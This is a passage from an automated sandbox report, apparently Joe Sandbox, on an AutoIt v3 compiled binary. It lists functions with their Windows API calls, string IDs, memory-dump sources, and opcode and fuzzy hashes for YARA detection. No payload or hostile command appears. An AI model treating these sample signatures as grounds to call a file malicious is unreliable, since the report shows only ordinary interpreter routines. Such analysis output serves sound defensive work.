                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001CA602
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001CA60B
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 001CA614
                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001CA642
                                                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 001CA659
                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 001CA694
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001CA6A8
                                                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 001CA6B9
                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 001CA6E9
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 001CA6F4
                                                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001CA6FF
                                                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001CA709
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                              • Opcode ID: a2dac53df530bf43fe43137ab74d00ee50fd056dea57c6e697df5c6aad76e3d2
                                                                                                                              • Instruction ID: 05f77f8dd06a998d6ffdff12c56de7a0a00ded74a77e700e63371150dabf9766
                                                                                                                              • Opcode Fuzzy Hash: a2dac53df530bf43fe43137ab74d00ee50fd056dea57c6e697df5c6aad76e3d2
                                                                                                                              • Instruction Fuzzy Hash: 40A14071A40219BFEB14DBA4DD49FBEBBB9EB04714F008115FA15A71E0D7B0AD50CB64
                                                                                                                              Function 001BE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001BE45E
                                                                                                                              • GetDriveTypeW.KERNEL32(?,0020DC88,?,\\.\,0020DBF0), ref: 001BE54B
                                                                                                                              • SetErrorMode.KERNEL32(00000000,0020DC88,?,\\.\,0020DBF0), ref: 001BE6B1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                              • API String ID: 2907320926-4222207086
                                                                                                                              • Opcode ID: f7542fa53c48b3ab405d24b93e43b92fc15e23efe854496d8a691a596046da63
                                                                                                                              • Instruction ID: d09163f42ce44964fa49bf721af793568d4fb63ee64c4b37ca2ba6853654fedd
                                                                                                                              • Opcode Fuzzy Hash: f7542fa53c48b3ab405d24b93e43b92fc15e23efe854496d8a691a596046da63
                                                                                                                              • Instruction Fuzzy Hash: F8512570258301BBC314EF54D891AE9B7E1BBA6704F62891BF406EB2A1DB70DE51DB42
                                                                                                                              Function 0017C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnicmp
                                                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                              • API String ID: 1038674560-86951937
                                                                                                                              • Opcode ID: c96367ed9898a78d0636b1a5e8e53c795a6a659100898f82fc2c1ac33ddfcded
                                                                                                                              • Instruction ID: 1c6322f942f6818c7b7af3e0bbf71584cce6804ce412bf886c131b80a65ca55f
                                                                                                                              • Opcode Fuzzy Hash: c96367ed9898a78d0636b1a5e8e53c795a6a659100898f82fc2c1ac33ddfcded
                                                                                                                              • Instruction Fuzzy Hash: 6A61FC316407127BDB29AA649C83FBA33BCAF26740F144029F959A71C3EF60DA51D6E1
                                                                                                                              Function 001DC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 001DC598
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 001DC64E
                                                                                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 001DC669
                                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 001DC925
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2326795674-4108050209
                                                                                                                              • Opcode ID: 0b25ded4791048787df18da4b93f6b100455dbbb0f841259b16a7e4f9d6c4068
                                                                                                                              • Instruction ID: d9d0b2893441344e8279706c2dd907c6f743554a4e758bf9b5ef263c2fd020cc
                                                                                                                              • Opcode Fuzzy Hash: 0b25ded4791048787df18da4b93f6b100455dbbb0f841259b16a7e4f9d6c4068
                                                                                                                              • Instruction Fuzzy Hash: CEF1D271204342AFE7258F24D889BAABBE5FF49354F080A2AF584D73A1D774D940DB92
                                                                                                                              Function 001D6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?,0020DBF0), ref: 001D6245
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                              • API String ID: 3964851224-45149045
                                                                                                                              • Opcode ID: b9c10bb9e84915ab2e5095b2b2486700cd42cec8f450fe70cc88b796e78a3542
                                                                                                                              • Instruction ID: 1309174593e4cfd885cdffd322444abd405a7d012431d0f45c37e8315edd1d4f
                                                                                                                              • Opcode Fuzzy Hash: b9c10bb9e84915ab2e5095b2b2486700cd42cec8f450fe70cc88b796e78a3542
                                                                                                                              • Instruction Fuzzy Hash: D0C195342142119FCB08FF54D451A6E77E6AFA5394F04886EF8865B396DF30DE4ACB82
                                                                                                                              Function 001DD385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSysColor.USER32(00000012), ref: 001DD3BE
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 001DD3C2
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 001DD3D8
                                                                                                                              • GetSysColor.USER32(0000000F), ref: 001DD3E3
                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 001DD3E8
                                                                                                                              • GetSysColor.USER32(00000011), ref: 001DD400
                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001DD40E
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 001DD41F
                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 001DD428
                                                                                                                              • SelectObject.GDI32(?,?), ref: 001DD435
                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 001DD454
                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001DD46B
                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 001DD480
                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001DD4A8
                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001DD4CF
                                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 001DD4ED
                                                                                                                              • DrawFocusRect.USER32(?,?), ref: 001DD4F8
                                                                                                                              • GetSysColor.USER32(00000011), ref: 001DD506
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 001DD50E
                                                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 001DD522
                                                                                                                              • SelectObject.GDI32(?,001DD0B5), ref: 001DD539
                                                                                                                              • DeleteObject.GDI32(?), ref: 001DD544
                                                                                                                              • SelectObject.GDI32(?,?), ref: 001DD54A
                                                                                                                              • DeleteObject.GDI32(?), ref: 001DD54F
                                                                                                                              • SetTextColor.GDI32(?,?), ref: 001DD555
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 001DD55F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1996641542-0
                                                                                                                              • Opcode ID: 605dcc08b1ad75e3d746645c5d1589bb7f83b03a59537c90b2862e9564af5989
                                                                                                                              • Instruction ID: 1b9613b202492b4367c87b0cfd9c055a288f6d8f446fbeccc86a3f942b2eca98
                                                                                                                              • Opcode Fuzzy Hash: 605dcc08b1ad75e3d746645c5d1589bb7f83b03a59537c90b2862e9564af5989
                                                                                                                              • Instruction Fuzzy Hash: C7511B72900218BFDF119FA8EC48EBE7BBAFB09320F214515F915AB2A1D7759980DB50
                                                                                                                              Function 001DB4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001DB5C0
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001DB5D1
                                                                                                                              • CharNextW.USER32(0000014E), ref: 001DB600
                                                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001DB641
                                                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001DB657
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001DB668
                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001DB685
                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 001DB6D7
                                                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 001DB6ED
                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 001DB71E
                                                                                                                              • _memset.LIBCMT ref: 001DB743
                                                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001DB78C
                                                                                                                              • _memset.LIBCMT ref: 001DB7EB
                                                                                                                              • SendMessageW.USER32 ref: 001DB815
                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 001DB86D
                                                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 001DB91A
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 001DB93C
                                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 001DB986
                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001DB9B3
                                                                                                                              • DrawMenuBar.USER32(?), ref: 001DB9C2
                                                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 001DB9EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1073566785-4108050209
                                                                                                                              • Opcode ID: 6807b4ce2ba39a367cc79e076a623152fb0b9682d31956e6210653992ccb93b1
                                                                                                                              • Instruction ID: 6ca27f8da1b13dd1644475dcf5a7043a8045e6fabd8e43a7a8b010ef400e209c
                                                                                                                              • Opcode Fuzzy Hash: 6807b4ce2ba39a367cc79e076a623152fb0b9682d31956e6210653992ccb93b1
                                                                                                                              • Instruction Fuzzy Hash: 58E17CB1904218EBDF209F91DCC4AFE7BB9EF05714F118156F91AAB290DB708A81DF60
                                                                                                                              Function 001D744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(?), ref: 001D7587
                                                                                                                              • GetDesktopWindow.USER32 ref: 001D759C
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 001D75A3
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001D7605
                                                                                                                              • DestroyWindow.USER32(?), ref: 001D7631
                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001D765A
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D7678
                                                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001D769E
                                                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 001D76B3
                                                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001D76C6
                                                                                                                              • IsWindowVisible.USER32(?), ref: 001D76E6
                                                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 001D7701
                                                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 001D7715
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001D772D
                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 001D7753
                                                                                                                              • GetMonitorInfoW.USER32 ref: 001D776D
                                                                                                                              • CopyRect.USER32(?,?), ref: 001D7784
                                                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 001D77EF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                              • String ID: ($0$tooltips_class32
                                                                                                                              • API String ID: 698492251-4156429822
                                                                                                                              • Opcode ID: 12956bbbfa0ae69413f3b39d4f0f160f6872019666004346520b3019c932ffa7
                                                                                                                              • Instruction ID: 5d8e59ecb3ef001bb875812e1974893a46f4ac03d807e920cd5a4b85ba37b965
                                                                                                                              • Opcode Fuzzy Hash: 12956bbbfa0ae69413f3b39d4f0f160f6872019666004346520b3019c932ffa7
                                                                                                                              • Instruction Fuzzy Hash: 24B19171608340AFDB04DF64D948B6ABBE5FF88310F00891EF5999B291EB70E845CB92
                                                                                                                              Function 0018A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0018A839
                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 0018A841
                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0018A86C
                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 0018A874
                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0018A899
                                                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0018A8B6
                                                                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0018A8C6
                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0018A8F9
                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0018A90D
                                                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 0018A92B
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 0018A947
                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0018A952
                                                                                                                                • Part of subcall function 0018B736: GetCursorPos.USER32(000000FF), ref: 0018B749
                                                                                                                                • Part of subcall function 0018B736: ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000001), ref: 0018B78B
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000002), ref: 0018B799
                                                                                                                              • SetTimer.USER32(00000000,00000000,00000028,0018ACEE), ref: 0018A979
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                              • String ID: AutoIt v3 GUI
                                                                                                                              • API String ID: 1458621304-248962490
                                                                                                                              • Opcode ID: a37df28e2d0181d689602e5b00e5507835a31181738b2925fe65d6c04a6acc09
                                                                                                                              • Instruction ID: 9139a8b7fee87ddcde50e42d0201d27a697382a65a4e46880e888351a53c35e1
                                                                                                                              • Opcode Fuzzy Hash: a37df28e2d0181d689602e5b00e5507835a31181738b2925fe65d6c04a6acc09
                                                                                                                              • Instruction Fuzzy Hash: 3AB15E71A0020AAFEB14EFA8DC45BAD7BB5BF08314F11422AFA1596290DB70D951CF55
                                                                                                                              Function 001D69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 001D6A52
                                                                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001D6B12
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                              • API String ID: 3974292440-719923060
                                                                                                                              • Opcode ID: 58f82714689a782f80f7a117a2257d1bfaf056700610ff019492aeb6191e90a7
                                                                                                                              • Instruction ID: 00050ef257fb7789395f148d6dd838c339751ddd6dba60d7d1411105fffb89ef
